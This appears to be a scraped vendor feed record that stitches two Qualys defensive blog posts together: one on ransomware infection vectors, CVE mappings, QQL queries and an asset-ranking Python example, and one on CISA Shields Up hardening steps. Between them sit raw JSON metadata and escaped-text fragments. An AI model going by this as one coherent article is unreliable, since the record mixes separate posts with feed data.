Although cyber criminals use a variety of techniques to infect victims with ransomware, the most common means of infection are:

 * **Remote Desktop Protocol** (RDP) vulnerabilities: RDP allows individuals to see and control the system remotely.
It is a very common practice in organizations as it provides easy remote access to systems. Once cybercriminals have RDP access, they can deploy malicious software on the system, making it inaccessible to legitimate users unless the victim pays the demanded ransom. A Shodan search shows currently open and potentially vulnerable RDP services on the internet, and you can buy RDP access for [as low as US$3](<https://www.bankinfosecurity.com/how-much-that-rdp-credential-in-window-a-10590>).

 * **Email phishing campaigns**: Email is a prevalent medium for getting malware into the target environment. Cybercriminals use emails to send malicious links that deploy malware on recipients' machines. It allows cybercriminals to steal sensitive data without breaking through network security and is very common among cybercriminals.
 * **Software vulnerabilities**: Software vulnerabilities are even more prevalent than phishing. Client- and server-side vulnerabilities allow criminals to take advantage of security weaknesses in widely used software, gain control of victim systems, and deploy ransomware. Vulnerabilities in VPN systems such as Pulse Secure VPN and Fortinet are common targets as well.

#### **Ransomware Attacks and Exact CVEs To Prioritize for Monitoring**

As mentioned above, known vulnerabilities and weaknesses are one of the top infection vectors.

The Qualys research team has performed extensive research on 36 prevalent ransomware families and has mapped them to 64 CVEs and the 247 QIDs that can detect them. The following is just a sample of some of the most widely used ransomware in attacks, along with the CVEs leveraged to infect systems.

**Ransomware** | **Description** | **CVE(s)** | **QID(s)**
---|---|---|---
Conti | The Conti ransomware strain will not only encrypt important files but will also exfiltrate them to a location controlled by the attacker. This method of extortion-ware is used to force victims to pay the ransom in order to avoid the sensitive data being leaked. Conti operators are known to use well-known hacking tools such as Mimikatz and Cobalt Strike leading up to the encryption of files. | CVE-2020-1472, CVE-2021-34527, CVE-2017-0143, CVE-2017-0144, CVE-2017-0145 | 91680, 91668, 91785, 91345, 91360
TeslaCrypt, PrincessLocker | TeslaCrypt ransomware was uploaded to VirusTotal in November 2014 but was more widely spread in early 2015 and continues to evolve. TeslaCrypt encrypts the files using the AES-256 algorithm until the victim pays the ransom in either Bitcoin or cash cards. | CVE-2013-2551, CVE-2015-8651 | 168351, 168350, 124422, 168341, 168340, 100271, 124421
Locky, Cerber | Cerber ransomware is ransomware-as-a-service (RaaS), meaning an attacker can distribute a licensed copy of this ransomware over the internet and pay commissions to the developer. | CVE-2016-1019 | 256924, 256922, 177873, 176784, 296029, 296028, 170815, 170724, 170711, 170365, 256256, 170264, 236438, 170119, 256214, 170052, 276628, 236342, 157445, 169942, 169941, 169923, 276572, 169854, 169853, 176004, 196742, 196725, 370320, 276455, 175965, 168848, 168813, 168792, 168696, 168694, 168594, 100282, 124879, 124872
WannaCry, BadRabbit | The WannaCry ransomware, formally known as WanaCrypt0r 2.0, spreads using an exploit called EternalBlue for a Windows SMBv1 vulnerability that Microsoft patched in March 2017 (MS17-010). | CVE-2017-0145 | 91361, 91360, 91359, 91347, 91345
DearCry, BlackKingdom | DearCry takes advantage of compromised Microsoft Exchange Servers with vulnerability CVE-2021-26855. When exploited, cybercriminals gain initial access to the Exchange Server and then install web shells. | CVE-2021-26855 | 50107, 50108

### Unified View of Critical Ransomware Risk Exposures

It is a daunting task to get a unified view of multiple critical ransomware exposures such as internet-facing vulnerabilities, misconfigurations, and unauthorized software. The Qualys Ransomware Risk Assessment & Remediation service dashboard enables security teams to see all internet-facing assets that are exposed to a ransomware-related vulnerability or misconfiguration and take the needed actions in the most impactful way. It also enables users to measure and track their effectiveness at addressing vulnerabilities or misconfigurations before they are used for ransomware attacks.

In addition, organizations should implement a good cyber hygiene program: scan for vulnerabilities and discover misconfigurations regularly with sufficient detection capabilities (such as QIDs) enabled, and run an efficient automated process to deploy important security patches on targeted assets quickly and at the needed scale.

### Qualys Ransomware Risk Assessment & Remediation Service

Qualys provides an all-in-one solution to discover, assess, prioritize, monitor, and patch critical vulnerabilities in real time across your global hybrid-IT landscape. The following sections provide an overview of each of the critical components of the Qualys product portfolio and how they are uniquely valuable in combating ransomware attacks.

#### Detect your critical data assets & monitor security blind spots with CyberSecurity Asset Management (CSAM)

CSAM enables organizations to automatically discover every asset in their environment, including unmanaged assets appearing on the network, inventory all hardware and software, and classify and tag critical assets.

#### Discover, Inventory and Categorize assets

It is important to know your blind spots to protect against ransomware.
Use CSAM to discover all assets, including the ones that are exposed to the internet as well as unknown/unmanaged assets that are connecting to your network.

CSAM automatically organizes your assets by functional category by analyzing their hardware and installed software. It extends your inventory by incorporating key business information from your CMDB, such as status, environment, ownership, support groups, and business criticality.

#### Monitor & detect at-risk assets and applications - Assets missing Anti-virus, running unauthorized software

CSAM enriches your asset inventory with in-context, relevant information to help you detect at-risk assets and applications. You can identify and set alerts for assets that are running unauthorized software or are not using anti-virus/endpoint security tools.

 * Unauthorized software should be removed to quickly reduce unnecessary attack vectors. With CSAM you can easily define rules to monitor unauthorized software installations.
 * Identify assets missing required security software, such as Antivirus and Endpoint Protection.
 * Identify EOL/EOS software, which can be used as a ransomware attack vector. End-of-Support software is one of the first things hackers look to exploit because they know publishers are no longer providing security updates and patches.

### Continuous detection & prioritization for Ransomware-specific vulnerabilities with VMDR

The first step in managing vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) makes it easy to identify systems with open ports, for example hosts with Remote Desktop Protocol (RDP) enabled:

    operatingSystem.category1:`Windows` and openPorts.port:`3389`

Once the hosts with RDP are identified, they can be grouped together with a 'dynamic tag', say "RDP Asset". This automatically groups existing hosts with this exposure as well as any new hosts that spin up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).

### **Discover and Prioritize Ransomware Vulnerabilities**

Now that hosts with RDP are identified, you want to detect which of these assets have ransomware-related vulnerabilities flagged. VMDR automatically detects new vulnerabilities, such as those in Windows RDP and Exchange Server, based on its continuously updated KnowledgeBase.

You can see all impacted hosts for ransomware-related vulnerabilities, tagged with the 'Ransomware' asset tag, in the Vulnerabilities view by using this QQL query:

    vulnerabilities.vulnerability.threatIntel.ransomware: true

or, for a specific family:

    vulnerabilities.vulnerability.ransomware.name:WannaCry

This will return a list of all impacted hosts.
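What the queries above select, and how the RDP tag and the ransomware threat-intel flag combine into a remediation order, can be reproduced offline. The following Python is an added example written for this page, not Qualys code and not a VMDR or QQL implementation: `rdp_assets()` applies the same condition as the first QQL query to an inline asset inventory, and `ransomware_exposure()` joins per-asset findings to a ransomware-to-CVE map and scores each asset on the signals a ransomware dashboard tracks (ransomware-linked vulnerabilities, internet-facing RDP, missing endpoint protection). The asset inventory and the findings are constructed sample data; the CVE map contains only the CVEs from the Conti, WannaCry and DearCry rows of the table above; the score weights are assumptions made for the example, not Qualys Real-Time Threat Indicators or a TruRisk score.

```python
"""Find RDP-exposed Windows hosts and rank assets by ransomware exposure.

Added example for this page (not Qualys code or a VMDR/QQL implementation).
Inventory, findings and the ransomware-to-CVE map are constructed here;
the map uses only CVEs listed in the table above.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, FrozenSet, Iterable, List, Set, Tuple

# Ransomware family -> CVEs it is known to leverage (from the table above; the
# full Qualys mapping covers 36 families and 64 CVEs, not reproduced here).
RANSOMWARE_CVES: Dict[str, Set[str]] = {
    "Conti": {"CVE-2020-1472", "CVE-2021-34527",
              "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145"},
    "WannaCry": {"CVE-2017-0145"},
    "DearCry": {"CVE-2021-26855"},
}

# Assumed score weights for ordering remediation work (not a Qualys metric).
W_PER_FAMILY, W_RDP_EXPOSED, W_INTERNET_FACING_VULN, W_MISSING_AV = 10, 40, 20, 15


@dataclass(frozen=True)
class Asset:
    name: str
    os_category: str            # e.g. "Windows", "Linux"
    open_ports: FrozenSet[int]
    internet_facing: bool
    has_endpoint_protection: bool


@dataclass(frozen=True)
class Exposure:
    asset: str
    families: Tuple[str, ...]   # ransomware families linked to the asset's open CVEs
    cves: Tuple[str, ...]       # the asset's open CVEs that appear in the map
    rdp_exposed: bool           # Windows, TCP/3389 open and reachable from the internet
    missing_av: bool
    score: int


def rdp_assets(assets: Iterable[Asset]) -> List[Asset]:
    """Same condition as the QQL query
    operatingSystem.category1:`Windows` and openPorts.port:`3389`."""
    return [a for a in assets if a.os_category == "Windows" and 3389 in a.open_ports]


def ransomware_exposure(assets: Iterable[Asset],
                        findings: Iterable[Tuple[str, str]],
                        mapping: Dict[str, Set[str]] = RANSOMWARE_CVES) -> List[Exposure]:
    """Join (asset, cve) findings to the ransomware map and rank assets, highest score first.
    Assets with no ransomware-linked CVE, no exposed RDP and endpoint protection present
    are left out of the report."""
    cve_to_families: Dict[str, Set[str]] = defaultdict(set)
    for family, cves in mapping.items():
        for cve in cves:
            cve_to_families[cve].add(family)

    cves_by_asset: Dict[str, Set[str]] = defaultdict(set)
    for asset_name, cve in findings:
        cves_by_asset[asset_name].add(cve)

    report: List[Exposure] = []
    for a in assets:
        hit_cves = sorted(c for c in cves_by_asset.get(a.name, set()) if c in cve_to_families)
        families = sorted({f for c in hit_cves for f in cve_to_families[c]})
        rdp_exposed = a.internet_facing and a.os_category == "Windows" and 3389 in a.open_ports
        missing_av = not a.has_endpoint_protection
        if not (hit_cves or rdp_exposed or missing_av):
            continue
        score = (W_PER_FAMILY * len(families)
                 + (W_RDP_EXPOSED if rdp_exposed else 0)
                 + (W_INTERNET_FACING_VULN if a.internet_facing and hit_cves else 0)
                 + (W_MISSING_AV if missing_av else 0))
        report.append(Exposure(a.name, tuple(families), tuple(hit_cves),
                               rdp_exposed, missing_av, score))
    return sorted(report, key=lambda e: (-e.score, e.asset))


# Constructed sample inventory and findings (names, ports and detections are made up).
SAMPLE_ASSETS = [
    Asset("dc-01", "Windows", frozenset({88, 389, 445, 3389}), False, True),
    Asset("mail-01", "Windows", frozenset({25, 443}), True, True),
    Asset("jump-01", "Windows", frozenset({3389}), True, False),
    Asset("web-01", "Linux", frozenset({22, 443}), True, True),
]
SAMPLE_FINDINGS = [
    ("dc-01", "CVE-2020-1472"), ("dc-01", "CVE-2017-0145"),
    ("mail-01", "CVE-2021-26855"),
    ("jump-01", "CVE-2021-34527"),
    ("web-01", "CVE-2021-44228"),   # not in the map above, so it does not count here
]

if __name__ == "__main__":
    print("RDP hosts:", [a.name for a in rdp_assets(SAMPLE_ASSETS)])
    for e in ransomware_exposure(SAMPLE_ASSETS, SAMPLE_FINDINGS):
        print(f"{e.asset:8} score={e.score:3}  families={e.families}  "
              f"rdp_exposed={e.rdp_exposed}  missing_av={e.missing_av}")
```

The ranking deliberately puts exposure context ahead of raw CVE count: the domain controller carries two ransomware-linked CVEs but is internal, so the internet-facing jump host with one CVE, open RDP and no endpoint protection sorts first, which is the order a remediation owner would want.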

Using VMDR prioritization, ransomware vulnerabilities can be easily prioritized using the "Ransomware" Real-Time Threat Intelligence:

VMDR also enables you to stay on top of these threats proactively via the 'live threat feed' provided for threat prioritization. With the live feed updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats.

Simply click on the impacted assets for the "Ransomware" feed to see the vulnerability and impacted host details.

Qualys provides a Unified Dashboard with key metrics across all apps, showing your overall security posture against ransomware-related data points such as:

 * Ransomware-related vulnerabilities
 * Unauthorized software
 * Misconfigurations leveraged by ransomware
 * Internet-facing hosts with RDP vulnerabilities, and many more

The Unified Dashboard enables you to track your ransomware exposure, impacted hosts, their status, and overall management in real time.

### **Discover and Mitigate Ransomware Misconfigurations such as SMB, Insecure RDP**

[Qualys Policy Compliance](<https://www.qualys.com/apps/policy-compliance/>) provides the Ransomware Best Practices policy, which contains critical controls mapped to the MITRE ATT&CK mitigations and tactics recommended by [CISA](<https://us-cert.cisa.gov/ncas/alerts/aa21-131a>) and best practices published by [FireEye Mandiant](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf>). These mitigations are effective across the top techniques and can reduce the risk of ransomware attacks. These critical controls can limit attacker initial access and lateral movement around the network.
\n\nAs organizations look to prevent the attacks from happening in the first place, security teams should focus on implementing these controls proactively and effectively across all assets to reduce the risk. By automating the configuration assessment with Qualys Policy Compliance, organizations can ensure golden images to conform to security baselines and prevent images from ever having misconfigurations and identify configurations drifts to prevent security risks. \n\n#### **Mitigation or Important Precautionary Measures and Controls ** \n\nThe Qualys internal research team has identified top five security measures and configuration controls; a security team should consider for their organization to prevent business interruption from a ransomware attack. Research is based on best practices published by FireEye (Mandiant), Cybersecurity and Infrastructure Security Agency (CISA), and CISA MS-ISAC. Policies/technical controls should be implemented. These configuration checks go beyond typical CIS or DISA benchmarks. \n \n\n 1. Enforce Password Policies. e.g. \n * Minimum password age should be set, \n * Password complexity requirements should be enabled. \n * Enforce password history restrictions. \n 2. Employ best practices for use of Remote Desktop protocol e. g \n * Disable RDP services if not necessary. \n * Close unused RDP ports, Audit the network for systems using RDP. \n * Apply Multifactor authentication. \n * Disable or block Server Message Block (SMB) protocol and remove or disable outdated versions of SMB. \n * RDP account controls \n 3. Employ Network security and Firewalls e.g. \n * Enforce firewall policy rules. \n * Deny all rule and allow only required networks, access. \n * Common ports and protocols that should be blocked. \n 4. Enforce Account Use Policies. E.g. \n * Apply account lockouts after a specified number of attempts. \n * Admin approval requirements. \n * Apply UAC restrictions on network logons etc. 
\n * Assign least privileges to users. \n 5. Keep software updated: \n * Ensure automatic updates are enabled. \n * Install patches and software updates in a timely manner, including for operating systems, applications, etc. \n\n\n\nQualys research has mapped misconfigurations to the relevant MITRE ATT&CK techniques (summarized in the table below) to define 237 configuration checks across five security areas (RDP hardening, user controls, network, protocol and port configuration security, share and password policies, and software update policies), essentially helping organizations proactively prevent 20 attack techniques leveraged in ransomware attacks. \n \n\n**TTP Map** \n\nInitial Access (TA0001)| Credential Access (TA0006)| Privilege Escalation (TA0004)| Execution (TA0002)| Defense Evasion (TA0005)| Lateral Movement (TA0008)| Command and Control (TA0011)| Impact (TA0040) \n---|---|---|---|---|---|---|--- \nValid Accounts (T1078)| Brute Force (T1110)| Abuse Elevation Control Mechanism (T1548)| Scheduled Task / Job (T1053)| Impair Defenses (T1562)| Remote Services (T1021)| Non-Application Layer Protocol (T1095)| Data Manipulation: Transmitted Data Manipulation (T1565.002) \nSupply Chain Compromise (T1195)| | Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002)| Inter-Process Communication (T1559)| Trusted Developer Utilities Proxy Execution (T1127)| Exploitation of Remote Services (T1210)| | \nSupply Chain Compromise: Compromise Software Dependencies and Development Tools (T1195.001)| | Access Token Manipulation (T1134)| | | Remote Services (T1021)| | \n | Unsecured Credentials (T1552)| | | | Remote Services: Remote Desktop Protocol (T1021.001)| | \n | | | | | Remote Services: Remote Desktop Protocol (T1021.002)| | \n | | | | | Remote Service Session Hijacking (T1563)| | \n \n### **Automated Proactive & Reactive Patching for Ransomware Vulnerabilities** \n\nTo keep the ransomware vulnerability patches always up 
to date on your assets, we strongly encourage users to take advantage of Qualys Zero-Touch Patch, which automatically patches new ransomware-related vulnerabilities that are actively used in attacks. Qualys Zero-Touch Patch enables businesses to patch and address at least 97% of ransomware-related vulnerabilities, faster and at scale. For more information on Qualys automatic patch capabilities, refer to the blog [Automate Vulnerability Remediation with Proactive Zero-Touch Patch](<https://blog.qualys.com/product-tech/2021/09/14/optimize-vulnerability-remediation-with-zero-touch-patch>). \n\nFollowing patch management best practices with Qualys Patch Management allows organizations to proactively remediate vulnerabilities related to ransomware and therefore minimize ransomware attacks in their environment. A simple and efficient way to use Qualys Patch Management to remediate ransomware-related vulnerabilities is to leverage the VMDR prioritization report described in a previous section, which detects assets with ransomware-related vulnerabilities. The tight integration between Qualys VMDR and Patch Management allows customers to add those ransomware-related vulnerabilities directly from the prioritization report into a patch job. The Qualys engine automatically maps the selected vulnerabilities to the patches required to remediate them in the customer\u2019s environment. This allows IT teams to focus on deploying those patch jobs without having to research vulnerabilities and manually find the relevant patches.\n\n\n\n### **Ready to Learn More and See for Yourself?** \n\n[Join the webinar](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>), Combating Risk from Ransomware Attacks, to discuss the current state of ransomware and prevention techniques. The webinar takes place October 21, 2021, at 10am Pacific. Sign up now! 
\n\n**Resources** \n \n\n * [Press Release](<https://www.qualys.com/company/newsroom/news-releases/usa/qualys-launches-ransomware-risk-assessment-service/>) \n * [Ransomware Assessment Service Video](<https://vimeo.com/617379785/>) \n * [Research Powered Qualys Ransomware Risk Assessment & Remediation service](<https://blog.qualys.com/product-tech/2021/10/05/assess-risk-ransomware-attacks-qualys-research>) \n * [Try Qualys Ransomware Risk Assessment Service](<https://www.qualys.com/forms/ransomware/>) \n * Learn more about the research and see the Qualys Ransomware Risk Assessment & Remediation service in action by attending the [webinar](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>) \n\n### References\n\n<https://www.ic3.gov/Content/PDF/Ransomware_Fact_Sheet.pdf> <https://www.ic3.gov/Media/Y2019/PSA191002> <https://www.ic3.gov/Media/PDF/AnnualReport/2020_IC3Report.pdf>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-05T12:50:00", "type": "qualysblog", "title": "The Rise of Ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551", 
"CVE-2015-8651", "CVE-2016-1019", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2020-1472", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-30116", "CVE-2021-34527"], "modified": "2021-10-05T12:50:00", "id": "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T01:27:17", "description": "**_CISA has created Shields Up as a response to the Russian invasion of Ukraine. Qualys is responding with additional security, monitoring and governance measures. This blog details how and what our enterprise customers can do to immediately strengthen their security posture and meet CISA\u2019s recommendations._**\n\nWith the invasion of Ukraine by Russia, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) has created a [program titled Shields Up](<https://www.cisa.gov/shields-up>) and provided specific guidance to all organizations. The Russian government has used cyber operations as a key component of force projection in the past and has targeted critical infrastructure to destabilize a government\u2019s response capabilities. Critical infrastructure can include supply chain (including software supply chain), power, utilities, communications, transportation, and government and military organizations.\n\n### Protecting Customer Data on Qualys Cloud Platform\n\nQualys is strongly committed to the security of our customers and their data. In addition to proactive risk mitigation with continuous patch and configuration management, we continually monitor all our environments for any indication of active threats, exploits and compromises. We hold our platforms to the highest security and compliance mandates like [FedRAMP](<https://blog.qualys.com/product-tech/2022/02/24/meet-fedramp-compliance-with-qualys-cloud-platform>). 
However, given the heightened risk environment around the globe, the Qualys Security and Engineering teams have been at a heightened state of vigilance in recent weeks. We continuously monitor our internal systems in this amplified threat environment. We are working with our security partners to access the latest threat intel. We have implemented additional security, monitoring, and governance measures involving our senior leadership and are committed to ensuring that the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>) remains available and secure to support the enterprises we serve worldwide.\n\n### Urgent: Assess and Heighten Your Security Posture\n\nBased on the high-level guidelines provided by CISA, Qualys recommends that all organizations take the following actionable steps to adopt a heightened cybersecurity posture and protect critical assets.\n\nThere are 4 steps necessary to strengthen security posture per CISA\u2019s Shields Up guidance: \n\n\n * Step 1: Know Your Shodan/Internet Exposed Assets Automatically\n * Step 2: Detect, Prioritize, and Remediate CISA's Catalog of Known Exploited Vulnerabilities\n * Step 3: Protect Your Cloud Services and Office 365 Environment\n * Step 4: Continuously Detect a Potential Intrusion\n\n* * *\n\n**Implement CISA\u2019s Shields Up Guidance**\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### Step 1: Monitor Your Shodan/Internet Exposed Assets \n\n\n#### Discover and protect your external facing assets \n\n\nAn organization\u2019s internet-facing systems represent much of its potential attack surface. Cyber threat actors are continuously scanning the internet for vulnerable systems to target in attacks and campaigns. Often, attackers find this information readily available on the dark web or in plain sight on internet search engines such as Shodan.io.\n\nInventory all your assets and monitor your external attack surface. 
[Qualys CyberSecurity Asset Management (CSAM)](<https://www.qualys.com/apps/cybersecurity-asset-management/>) provides comprehensive visibility of your external-facing IT infrastructure by natively correlating asset telemetry collected by Qualys sensors (e.g. Internet Scanners, Cloud Agents, Network Passive Sensors) and key built-in integrations such as [Shodan.io](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/qualys-integrates-with-shodan-to-help-map-the-external-attack-surface>) and public cloud providers.\n\nOne of the biggest risks is unknown unknowns. These gaps in visibility happen for many reasons, including shadow IT, forgotten websites, legacy services, mergers & acquisitions (M&A), or simply because a development team exposes an application or database without informing the security team.\n\nCSAM enables you to continuously discover these blind spots and assess their security and compliance posture.\n\n\n\n#### Monitor Industrial Control Systems and Operational Technology\n\nNetwork segmentation traditionally kept Industrial Control Systems air-gapped. However, the acceleration of digital transformation has enabled more of these systems to connect with corporate as well as external networks, such as device vendors and Industrial IoT platforms. Further, the majority of Operational Technology uses legacy, non-secure protocols.\n\nBuild full visibility of your critical infrastructure, network communications, and vulnerabilities with Qualys Industrial Control Security (ICS).\n\n\n\n#### Detect and disable all non-essential ports and protocols, especially on internet exposed assets\n\nInventory your internal and external-facing assets, and report the open ports and the services detected on each port. Qualys CSAM supports an extensive query language that enables teams to report and act on detected external-facing assets that have a remote-control service running (for example Windows Remote Desktop). 
\n\n\n\n#### Ensure all systems are protected with up-to-date antivirus/anti-malware software\n\nFlag assets within your inventory that are missing antivirus, or whose signatures are not up to date. CSAM allows you to define Software Rules and assign required software to a specific scope of assets or environment. For example, all database servers should have antivirus and a data loss prevention agent.\n\n\n\nVerify that your antivirus/anti-malware engine is up to date with the latest signatures.\n\n\n\nFor devices missing antivirus or anti-malware, [Qualys Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>) with Integrated Anti-Malware can be easily enabled wherever the Qualys Cloud Agent is installed to provide immediate threat protection. In addition to basic anti-malware protection, Multi-Vector EDR monitors endpoint activity to identify suspicious and malicious activity that usually bypasses traditional antivirus, such as Living-off-the-Land attacks, and maps it to MITRE ATT&CK tactics and techniques.\n\n### Step 2: Detect, Prioritize and Remediate CISA's Catalog of Known Exploited Vulnerabilities\n\nQualys researchers analyzed all 300+ CVEs from the CISA Known Exploited Vulnerabilities catalog and mapped them to Qualys QIDs. Many of these CVEs have had patches available for several years. A new \u201cCISA Exploited\u201d RTI was added to VMDR to help customers create vulnerability reports that focus on CISA exploited vulnerabilities. Customers can use the VMDR Vulnerabilities page or VMDR Prioritization page and filter the results to focus on all the \u201cCISA Exploited\u201d open vulnerabilities in their environment. 
\n\nThe following are some of the critical vulnerabilities cataloged by CISA that are specifically known to be exploited by Russian state-sponsored APT actors for initial access:\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability (CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065| 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n \nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### Remediate CISA recommended catalog of exploited vulnerabilities \n\nFor all CISA cataloged vulnerabilities known to be exploited by Russian state-sponsored 
actors, [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) customers can create patch and configuration-fix jobs to remediate the risk of all those vulnerabilities directly from the VMDR console. Qualys Patch Management maps \u201cCISA Exploited\u201d vulnerabilities detected in the environment to the relevant patches required to remediate them, and downloads the patches without needing to go through the VPN. Customers may use Zero-Touch patching to automate the process and ensure all CISA exploited vulnerabilities are automatically fixed, including new vulnerabilities added to the CISA catalog in the future. \n\n\n\n#### Monitor and ensure your software is always up to date\n\nImmediately know all end-of-support critical components across your environment, including open-source software. Qualys CSAM tracks lifecycle stages and the corresponding support status to help organizations manage their technical debt and reduce the risk of no longer receiving security patches from the vendor. Security and IT teams can work together to plan upgrades ahead of time by knowing upcoming end-of-life and end-of-support dates.\n\n\n\nUse the \u201cPrioritize Report\u201d function in Qualys Patch Management to map the software in your environment to the security risk it poses. Prioritize your remediation efforts based on the software that introduces the most risk. Use this report to create automated patch jobs to ensure that the riskiest software is always up to date. Alternatively, deploy individual patches for the riskiest software. 
\n\n\n\n### Step 3: Protect Your Cloud Services and Office 365\n\nAs noted by CISA, misconfiguration of cloud services and SaaS applications like Office 365 is the primary attack vector for breaches.\n\n#### Detect and Remediate Public Cloud Infrastructure Misconfigurations\n\nProtect your public cloud infrastructure by securing the following services as a priority:\n\n * **IAM**: Ensure all users have MFA enabled and rotate all access keys older than 30 days. Verify that all service accounts are valid (i.e. in use) and have the minimum privilege.\n * **Audit Logs**: Turn on access logging for all cloud management events and for critical services (e.g. S3, RDS, etc.)\n * **Public-facing assets**: Validate that the firewall rules for public-facing assets allow only the needed ports. Pay special attention to RDP access. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.\n\nAutomatically detect and remediate cloud misconfigurations using [Qualys CloudView](<https://www.qualys.com/apps/cloud-security-assessment/>).\n\n\n\n#### Protect your Office 365 and Other SaaS Services\n\nEnforce multi-factor authentication on all accounts with access to Office 365 tenants. At a minimum, enable MFA for accounts with any admin access rights to the tenant. [Qualys SaaSDR](<https://www.qualys.com/apps/saas-detection-response/>) lists all such accounts on which MFA is disabled. Further, Qualys SaaSDR enables continuous security posture assessment of Office 365 via the CIS (Center for Internet Security) certified policy for Office, along with automated security configuration assessment for Zoom, Salesforce, and Google Workspace. 
This is based on an analysis of all security weaknesses, critical vulnerabilities, and exploits leveraged by attackers in historical attacks as well as security assessments based on the MITRE ATT&CK framework.\n\n\n\n### Step 4: Continuously Detect any Potential Threats and Attacks \n\nMonitor for increases in suspicious and malicious activities as well as anomalous behavior on all endpoints. With Qualys Multi-Vector EDR, customers can detect Indicators of Compromise (IOC) and MITRE ATT&CK Tactics & Techniques provided by CISA and respond quickly to mitigate the risk by capturing process, file, and network events on the endpoint and correlating them with the latest Threat Intelligence, including new and upcoming Indicators of Compromise (IOC) constantly added by the Qualys Research Team. Anomalous endpoint behavior is detected and identified as MITRE ATT&CK Tactics and Techniques.\n\n\n\nThe Appendix at the bottom of this post contains a list of Indicators of Compromise (IOC) and MITRE ATT&CK Tactics & Techniques being utilized.\n\n## Take Action to Learn More about How to Strengthen Your Defenses\n\nWe encourage you to learn more about how to strengthen your defenses consistent with CISA Shields Up guidelines using Qualys Cloud Platform. Join our webinar, [How to Meet CISA Shields Up Guidelines for Cyberattack Protection](<https://event.on24.com/wcc/r/3684128/0F6FB4010D39461FD4209A3E4EB8E9CD>), on March 3, 2022.\n\nQualys recommends that all organizations, regardless of size, heighten their security posture based on the above actionable steps, to protect critical cyber infrastructure from potential state-sponsored, advanced cyberattacks. Qualys Cloud Platform remains continuously committed to high standards of security and compliance to safeguard customer data. 
